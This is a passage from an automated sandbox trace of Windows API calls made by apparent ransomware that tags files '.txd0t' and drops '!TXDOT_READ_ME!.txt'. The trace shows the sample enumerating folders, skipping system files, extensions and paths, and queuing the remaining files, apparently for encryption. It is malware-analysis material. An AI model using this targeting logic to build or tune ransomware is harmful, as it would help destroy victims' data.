lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0085.863] StrCmpW (psz1=".", psz2=".") returned 0 [0085.863] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.863] StrCmpW (psz1="..", psz2=".") returned 1 [0085.863] StrCmpW (psz1="..", psz2="..") returned 0 [0085.863] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.863] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.863] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.863] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0085.863] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0085.863] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="C:\\588bce7c90097ed212\\1043\\eula.rtf" [0085.863] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.863] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.863] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.863] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.863] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.864] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.864] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.864] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.864] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.894] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.894] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1043\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" [0085.894] SetEvent (hEvent=0x410) returned 1 [0085.894] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.894] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.895] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.895] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0085.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0085.895] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0085.895] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.895] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.895] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.895] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.895] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.895] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.897] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.897] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0085.897] SetEvent (hEvent=0x418) returned 1 [0085.897] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.897] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.897] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.897] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0085.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0085.897] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" [0085.897] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.897] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.897] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.897] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.897] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.897] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.898] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0085.901] GetProcessHeap () returned 0xe30000 [0085.901] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.901] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0085.901] StrCmpW (psz1="1044", psz2=".") returned 1 [0085.901] StrCmpW (psz1="1044", psz2="..") returned 1 [0085.901] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.901] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.901] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1044", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system32\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\local\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\boot\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\perflogs\\") returned 0x0 [0085.901] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\programdata\\") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\drivers\\") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\wsus\\") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="crypt_detect") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="cryptolocker") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="ransomware") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\WINDOWS") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.902] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files") returned 0x0 [0085.902] GetProcessHeap () returned 0xe30000 [0085.902] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.902] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0085.902] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\*") returned="C:\\588bce7c90097ed212\\1044\\*" [0085.902] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0085.902] StrCmpW (psz1=".", psz2=".") returned 0 [0085.902] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.902] StrCmpW (psz1="..", psz2=".") returned 1 [0085.902] StrCmpW (psz1="..", psz2="..") returned 0 [0085.902] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.902] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.902] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.902] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0085.902] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0085.902] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="C:\\588bce7c90097ed212\\1044\\eula.rtf" [0085.902] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.902] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.902] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.902] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.903] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.903] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.903] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.903] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.919] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.919] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1044\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" [0085.919] SetEvent (hEvent=0x410) returned 1 [0085.919] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.919] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.919] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.919] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0085.919] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0085.919] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0085.919] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.919] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.919] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.920] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.920] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.920] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.920] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.988] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.988] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0085.988] SetEvent (hEvent=0x408) returned 1 [0085.989] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.990] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.990] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.990] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0085.990] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0085.990] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" [0085.990] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.990] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.990] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.996] StrCmpIW 